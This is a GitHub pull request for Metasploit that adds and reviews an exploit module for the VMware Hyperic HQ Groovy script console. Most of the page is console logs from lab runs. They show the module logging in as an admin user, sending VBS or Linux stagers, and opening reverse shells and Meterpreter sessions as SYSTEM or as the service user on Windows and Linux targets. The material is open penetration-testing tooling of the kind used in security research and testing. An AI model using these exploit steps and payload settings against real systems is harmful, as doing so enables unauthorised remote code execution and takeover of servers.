Skip to content

/ metasploit-framework

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add VMware Hyperic HQ Groovy Script-Console Java Execution #2502

Merged
merged 1 commit into from Oct 11, 2013
Merged

Add VMware Hyperic HQ Groovy Script-Console Java Execution #2502

merged 1 commit into from Oct 11, 2013

Conversation

@bcoles
Copy link
Contributor

bcoles commented Oct 10, 2013

Add VMware Hyperic HQ Groovy Script-Console Java Execution module.

VMware Hyperic HQ Groovy Script-Console Java Execution

Check

msf exploit(hyperic_hq_script_console) > check

[*] 192.168.124.212:7443 - Authenticating as 'hqadmin'
[+] 192.168.124.212:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.124.212:7443 - Checking access to the script console
[+] The target is vulnerable.

Run

msf exploit(hyperic_hq_script_console) > run

[*] Started reverse handler on 192.168.124.180:4444 
[+] 192.168.124.212:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.124.212:7443 - Checking access to the script console
[*] 192.168.124.212:7443 - Sending VBS stager...
[*] Command Stager progress -   2.01% done (2048/101881 bytes)
[*] Command Stager progress -   4.02% done (4096/101881 bytes)
[*] Command Stager progress -   6.03% done (6144/101881 bytes)
[*] Command Stager progress -   8.04% done (8192/101881 bytes)
[*] Command Stager progress -  10.05% done (10240/101881 bytes)
[*] Command Stager progress -  12.06% done (12288/101881 bytes)
[*] Command Stager progress -  14.07% done (14336/101881 bytes)
[*] Command Stager progress -  16.08% done (16384/101881 bytes)
[*] Command Stager progress -  18.09% done (18432/101881 bytes)
[*] Command Stager progress -  20.10% done (20480/101881 bytes)
[*] Command Stager progress -  22.11% done (22528/101881 bytes)
[*] Command Stager progress -  24.12% done (24576/101881 bytes)
[*] Command Stager progress -  26.13% done (26624/101881 bytes)
[*] Command Stager progress -  28.14% done (28672/101881 bytes)
[*] Command Stager progress -  30.15% done (30720/101881 bytes)
[*] Command Stager progress -  32.16% done (32768/101881 bytes)
[*] Command Stager progress -  34.17% done (34816/101881 bytes)
[*] Command Stager progress -  36.18% done (36864/101881 bytes)
[*] Command Stager progress -  38.19% done (38912/101881 bytes)
[*] Command Stager progress -  40.20% done (40960/101881 bytes)
[*] Command Stager progress -  42.21% done (43008/101881 bytes)
[*] Command Stager progress -  44.22% done (45056/101881 bytes)
[*] Command Stager progress -  46.23% done (47104/101881 bytes)
[*] Command Stager progress -  48.24% done (49152/101881 bytes)
[*] Command Stager progress -  50.25% done (51200/101881 bytes)
[*] Command Stager progress -  52.26% done (53248/101881 bytes)
[*] Command Stager progress -  54.28% done (55296/101881 bytes)
[*] Command Stager progress -  56.29% done (57344/101881 bytes)
[*] Command Stager progress -  58.30% done (59392/101881 bytes)
[*] Command Stager progress -  60.31% done (61440/101881 bytes)
[*] Command Stager progress -  62.32% done (63488/101881 bytes)
[*] Command Stager progress -  64.33% done (65536/101881 bytes)
[*] Command Stager progress -  66.34% done (67584/101881 bytes)
[*] Command Stager progress -  68.35% done (69632/101881 bytes)
[*] Command Stager progress -  70.36% done (71680/101881 bytes)
[*] Command Stager progress -  72.37% done (73728/101881 bytes)
[*] Command Stager progress -  74.38% done (75776/101881 bytes)
[*] Command Stager progress -  76.39% done (77824/101881 bytes)
[*] Command Stager progress -  78.40% done (79872/101881 bytes)
[*] Command Stager progress -  80.41% done (81920/101881 bytes)
[*] Command Stager progress -  82.42% done (83968/101881 bytes)
[*] Command Stager progress -  84.43% done (86016/101881 bytes)
[*] Command Stager progress -  86.44% done (88064/101881 bytes)
[*] Command Stager progress -  88.45% done (90112/101881 bytes)
[*] Command Stager progress -  90.46% done (92160/101881 bytes)
[*] Command Stager progress -  92.47% done (94208/101881 bytes)
[*] Command Stager progress -  94.48% done (96256/101881 bytes)
[*] Command Stager progress -  96.49% done (98304/101881 bytes)
[*] Command Stager progress -  98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (770048 bytes) to 192.168.124.212
[*] Meterpreter session 1 opened (192.168.124.180:4444 -> 192.168.124.212:1084) at 2013-10-10 15:08:41 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
@bcoles
Add VMware Hyperic HQ Groovy Script-Console Java Execution
Loading status checks…
276ea22
@bcoles

This comment has been minimized.

Sign in to view
Copy link
Owner Author

bcoles commented on modules/exploits/multi/http/hyperic_hq_script_console.rb in 276ea22 Oct 10, 2013

I got bored. Only a Windows target is provided.

If installed, the 'Hyperic HQ Server' Windows service runs as 'Local System' by default.
@bcoles

This comment has been minimized.

Sign in to view
Copy link
Owner Author

bcoles commented on modules/exploits/multi/http/hyperic_hq_script_console.rb in 276ea22 Oct 10, 2013

The Groovy console executes arbitrary Java code (and operating system commands) by design so DisclosureDate may not be applicable here.
@jvazquez-r7

This comment has been minimized.

Sign in to view
Copy link
Contributor

jvazquez-r7 commented Oct 11, 2013

Processing....
modules/exploits/multi/http/hyperic_hq_script_console.rb
], self.class)
end

def peer

This comment has been minimized.

Sign in to view
Copy link
@jvazquez-r7

jvazquez-r7 Oct 11, 2013

Contributor

You don't need this method because Msf::Exploit::Remote::HttpClient is already providing it
@jvazquez-r7

This comment has been minimized.

Sign in to view
Copy link
Contributor

jvazquez-r7 commented Oct 11, 2013

The CMD ("unix") platform is working:

msf exploit(hyperic_hq_script_console) > set target 2
target => 2
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[*] 192.168.172.134:7080 - Sending UNIX payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo L9QHQ6xIeHRfeX1o;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "L9QHQ6xIeHRfeX1o\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.134:38345) at 2013-10-11 11:57:17 -0500

id
uid=1001(hyperic) gid=1001(hyperic) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),30(dip),44(video),46(plugdev),104(fuse),121(nopasswdlogin),1001(hyperic)
^C
Abort session 2? [y/N]  y

[*] 192.168.172.134 - Command shell session 2 closed.  Reason: User exit

But not the linux one :\ checking if I can spot what is happening:

msf exploit(hyperic_hq_script_console) > set target 1
target => 1
msf exploit(hyperic_hq_script_console) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(hyperic_hq_script_console) > check

[*] 192.168.172.134:7080 - Authenticating as 'hqadmin'
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[+] The target is vulnerable.
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[*] 192.168.172.134:7080 - Sending Linux stager...
[*] Exploit completed, but no session was created.
@jvazquez-r7

This comment has been minimized.

Sign in to view
Copy link
Contributor

jvazquez-r7 commented Oct 11, 2013

  • But working with linux/x86/shell/reverse_tcp... digging
msf exploit(hyperic_hq_script_console) > set payload linux/x86/shell/reverse_tcp 
payload => linux/x86/shell/reverse_tcp
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[*] 192.168.172.134:7080 - Sending Linux stager...
[*] Sending stage (36 bytes) to 192.168.172.134
[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.134:38349) at 2013-10-11 12:02:29 -0500
[!] 192.168.172.134:7080 - Deleting /tmp/cUxh15 payload file

id
uid=1001(hyperic) gid=1001(hyperic) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),30(dip),44(video),46(plugdev),104(fuse),121(nopasswdlogin),1001(hyperic)
^C
Abort session 3? [y/N]  y
@jvazquez-r7

This comment has been minimized.

Sign in to view
Copy link
Contributor

jvazquez-r7 commented Oct 11, 2013

  • oooum working with meterpreter too.... maybe jsut something weird
msf exploit(hyperic_hq_script_console) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[*] 192.168.172.134:7080 - Sending Linux stager...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.172.134
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.134:38350) at 2013-10-11 12:03:27 -0500
[!] 192.168.172.134:7080 - Deleting /tmp/cdLxkV9x payload file

meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001, suid=1001, sgid=1001
meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >
jvazquez-r7 pushed a commit that referenced this pull request Oct 11, 2013
jvazquez-r7
Lnad #2502, @bcoles's exploit for VMware Hyperic
Unverified
No user is associated with the committer email.
Learn about signing commits
Loading status checks…
11b6512
@jvazquez-r7 jvazquez-r7 merged commit 276ea22 into rapid7:master Oct 11, 2013
1 check passed
1 check passed
default The Travis CI build passed
Details
@jvazquez-r7

This comment has been minimized.

Sign in to view
Copy link
Contributor

jvazquez-r7 commented Oct 11, 2013

Hi @bcoles, landed, thanks for another contribution!

Just cleaned it a little, checked the linux and unix targets, and add an automatic target to autodetect so now module is ExcelentRanking. Please review changes here: 0b93996

All the test results:

Automatic target:

  • Linux
msf exploit(hyperic_hq_script_console) > set payload linux/x86/shell/reverse_tcp 
payload => linux/x86/shell/reverse_tcp
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7443 - Checking access to the script console
[*] 192.168.172.134:7443 - Trying to detect the remote target...
[+] 192.168.172.134:7443 - Linux target found
[*] 192.168.172.134:7443 - Sending Linux stager...
[*] Sending stage (36 bytes) to 192.168.172.134
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.134:38355) at 2013-10-11 13:10:09 -0500
[!] 192.168.172.134:7443 - Deleting /tmp/H29xDl5 payload file

id
uid=1001(hyperic) gid=1001(hyperic) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),30(dip),44(video),46(plugdev),104(fuse),121(nopasswdlogin),1001(hyperic)
^C
Abort session 1? [y/N]  y

[*] 192.168.172.134 - Command shell session 1 closed.  Reason: User exit
msf exploit(hyperic_hq_script_console) >
  • Windows
msf exploit(hyperic_hq_script_console) > set target 0
target => 0
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.136:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.136:7443 - Checking access to the script console
[*] 192.168.172.136:7443 - Trying to detect the remote target...
[+] 192.168.172.136:7443 - Windows target found
[*] 192.168.172.136:7443 - Sending VBS stager...
[*] Command Stager progress -   2.01% done (2048/101881 bytes)
[*] Command Stager progress -   4.02% done (4096/101881 bytes)
[*] Command Stager progress -   6.03% done (6144/101881 bytes)
[*] Command Stager progress -   8.04% done (8192/101881 bytes)
[*] Command Stager progress -  10.05% done (10240/101881 bytes)
[*] Command Stager progress -  12.06% done (12288/101881 bytes)
[*] Command Stager progress -  14.07% done (14336/101881 bytes)
[*] Command Stager progress -  16.08% done (16384/101881 bytes)
[*] Command Stager progress -  18.09% done (18432/101881 bytes)
[*] Command Stager progress -  20.10% done (20480/101881 bytes)
[*] Command Stager progress -  22.11% done (22528/101881 bytes)
[*] Command Stager progress -  24.12% done (24576/101881 bytes)
[*] Command Stager progress -  26.13% done (26624/101881 bytes)
[*] Command Stager progress -  28.14% done (28672/101881 bytes)
[*] Command Stager progress -  30.15% done (30720/101881 bytes)
[*] Command Stager progress -  32.16% done (32768/101881 bytes)
[*] Command Stager progress -  34.17% done (34816/101881 bytes)
[*] Command Stager progress -  36.18% done (36864/101881 bytes)
[*] Command Stager progress -  38.19% done (38912/101881 bytes)
[*] Command Stager progress -  40.20% done (40960/101881 bytes)
[*] Command Stager progress -  42.21% done (43008/101881 bytes)
[*] Command Stager progress -  44.22% done (45056/101881 bytes)
[*] Command Stager progress -  46.23% done (47104/101881 bytes)
[*] Command Stager progress -  48.24% done (49152/101881 bytes)
[*] Command Stager progress -  50.25% done (51200/101881 bytes)
[*] Command Stager progress -  52.26% done (53248/101881 bytes)
[*] Command Stager progress -  54.28% done (55296/101881 bytes)
[*] Command Stager progress -  56.29% done (57344/101881 bytes)
[*] Command Stager progress -  58.30% done (59392/101881 bytes)
[*] Command Stager progress -  60.31% done (61440/101881 bytes)
[*] Command Stager progress -  62.32% done (63488/101881 bytes)
[*] Command Stager progress -  64.33% done (65536/101881 bytes)
[*] Command Stager progress -  66.34% done (67584/101881 bytes)
[*] Command Stager progress -  68.35% done (69632/101881 bytes)
[*] Command Stager progress -  70.36% done (71680/101881 bytes)
[*] Command Stager progress -  72.37% done (73728/101881 bytes)
[*] Command Stager progress -  74.38% done (75776/101881 bytes)
[*] Command Stager progress -  76.39% done (77824/101881 bytes)
[*] Command Stager progress -  78.40% done (79872/101881 bytes)
[*] Command Stager progress -  80.41% done (81920/101881 bytes)
[*] Command Stager progress -  82.42% done (83968/101881 bytes)
[*] Command Stager progress -  84.43% done (86016/101881 bytes)
[*] Command Stager progress -  86.44% done (88064/101881 bytes)
[*] Command Stager progress -  88.45% done (90112/101881 bytes)
[*] Command Stager progress -  90.46% done (92160/101881 bytes)
[*] Command Stager progress -  92.47% done (94208/101881 bytes)
[*] Command Stager progress -  94.48% done (96256/101881 bytes)
[*] Command Stager progress -  96.49% done (98304/101881 bytes)
[*] Command Stager progress -  98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (770048 bytes) to 192.168.172.136
[*] Meterpreter session 5 opened (192.168.172.1:4444 -> 192.168.172.136:1051) at 2013-10-11 13:18:25 -0500

meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(hyperic_hq_script_console) >

Manual target

  • Linux
msf exploit(hyperic_hq_script_console) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows
   2   Linux
   3   Unix CMD


msf exploit(hyperic_hq_script_console) > set target 2
target => 2
msf exploit(hyperic_hq_script_console) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7443 - Checking access to the script console
[*] 192.168.172.134:7443 - Sending Linux stager...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.172.134
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.134:38356) at 2013-10-11 13:11:24 -0500
[!] 192.168.172.134:7443 - Deleting /tmp/8ymC47 payload file

meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001, suid=1001, sgid=1001
meterpreter > sysinfo
eComputer     : ubuntu
OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.134 - Meterpreter session 2 closed.  Reason: User exit
  • unix
msf exploit(hyperic_hq_script_console) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows
   2   Linux
   3   Unix CMD


msf exploit(hyperic_hq_script_console) > set target 3
target => 3
msf exploit(hyperic_hq_script_console) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[+] 192.168.172.134:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7443 - Checking access to the script console
[*] 192.168.172.134:7443 - Sending UNIX payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 1tfXkyIEd1DnyXem;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "1tfXkyIEd1DnyXem\r\n"
[*] Matching...
[*] B is input...
i[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.134:38358) at 2013-10-11 13:12:21 -0500
d

uid=1001(hyperic) gid=1001(hyperic) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),30(dip),44(video),46(plugdev),104(fuse),121(nopasswdlogin),1001(hyperic)
  • Windows
msf exploit(hyperic_hq_script_console) > set target 1
target => 1
msf exploit(hyperic_hq_script_console) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hyperic_hq_script_console) > check

[*] 192.168.172.136:7443 - Authenticating as 'hqadmin'
[+] 192.168.172.136:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.136:7443 - Checking access to the script console
[+] The target is vulnerable.
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.136:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.136:7443 - Checking access to the script console
[*] 192.168.172.136:7443 - Sending VBS stager...
[*] Command Stager progress -   2.01% done (2048/101881 bytes)
[*] Command Stager progress -   4.02% done (4096/101881 bytes)
[*] Command Stager progress -   6.03% done (6144/101881 bytes)
[*] Command Stager progress -   8.04% done (8192/101881 bytes)
[*] Command Stager progress -  10.05% done (10240/101881 bytes)
[*] Command Stager progress -  12.06% done (12288/101881 bytes)
[*] Command Stager progress -  14.07% done (14336/101881 bytes)
[*] Command Stager progress -  16.08% done (16384/101881 bytes)
[*] Command Stager progress -  18.09% done (18432/101881 bytes)
[*] Command Stager progress -  20.10% done (20480/101881 bytes)
[*] Command Stager progress -  22.11% done (22528/101881 bytes)
[*] Command Stager progress -  24.12% done (24576/101881 bytes)
[*] Command Stager progress -  26.13% done (26624/101881 bytes)
[*] Command Stager progress -  28.14% done (28672/101881 bytes)
[*] Command Stager progress -  30.15% done (30720/101881 bytes)
[*] Command Stager progress -  32.16% done (32768/101881 bytes)
[*] Command Stager progress -  34.17% done (34816/101881 bytes)
[*] Command Stager progress -  36.18% done (36864/101881 bytes)
[*] Command Stager progress -  38.19% done (38912/101881 bytes)
[*] Command Stager progress -  40.20% done (40960/101881 bytes)
[*] Command Stager progress -  42.21% done (43008/101881 bytes)
[*] Command Stager progress -  44.22% done (45056/101881 bytes)
[*] Command Stager progress -  46.23% done (47104/101881 bytes)
[*] Command Stager progress -  48.24% done (49152/101881 bytes)
[*] Command Stager progress -  50.25% done (51200/101881 bytes)
[*] Command Stager progress -  52.26% done (53248/101881 bytes)
[*] Command Stager progress -  54.28% done (55296/101881 bytes)
[*] Command Stager progress -  56.29% done (57344/101881 bytes)
[*] Command Stager progress -  58.30% done (59392/101881 bytes)
[*] Command Stager progress -  60.31% done (61440/101881 bytes)
[*] Command Stager progress -  62.32% done (63488/101881 bytes)
[*] Command Stager progress -  64.33% done (65536/101881 bytes)
[*] Command Stager progress -  66.34% done (67584/101881 bytes)
[*] Command Stager progress -  68.35% done (69632/101881 bytes)
[*] Command Stager progress -  70.36% done (71680/101881 bytes)
[*] Command Stager progress -  72.37% done (73728/101881 bytes)
[*] Command Stager progress -  74.38% done (75776/101881 bytes)
[*] Command Stager progress -  76.39% done (77824/101881 bytes)
[*] Command Stager progress -  78.40% done (79872/101881 bytes)
[*] Command Stager progress -  80.41% done (81920/101881 bytes)
[*] Command Stager progress -  82.42% done (83968/101881 bytes)
[*] Command Stager progress -  84.43% done (86016/101881 bytes)
[*] Command Stager progress -  86.44% done (88064/101881 bytes)
[*] Command Stager progress -  88.45% done (90112/101881 bytes)
[*] Command Stager progress -  90.46% done (92160/101881 bytes)
[*] Command Stager progress -  92.47% done (94208/101881 bytes)
[*] Command Stager progress -  94.48% done (96256/101881 bytes)
[*] Command Stager progress -  96.49% done (98304/101881 bytes)
[*] Command Stager progress -  98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (770048 bytes) to 192.168.172.136
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.136:1050) at 2013-10-11 13:17:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(hyperic_hq_script_console) >
@bcoles

This comment has been minimized.

Sign in to view
Copy link
Contributor Author

bcoles commented Oct 11, 2013

Cool. Thanks for cleaning this up. 🔨🐢
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Linked issues

Successfully merging this pull request may close these issues.

None yet

2 participants
@bcoles @jvazquez-r7
You can’t perform that action at this time.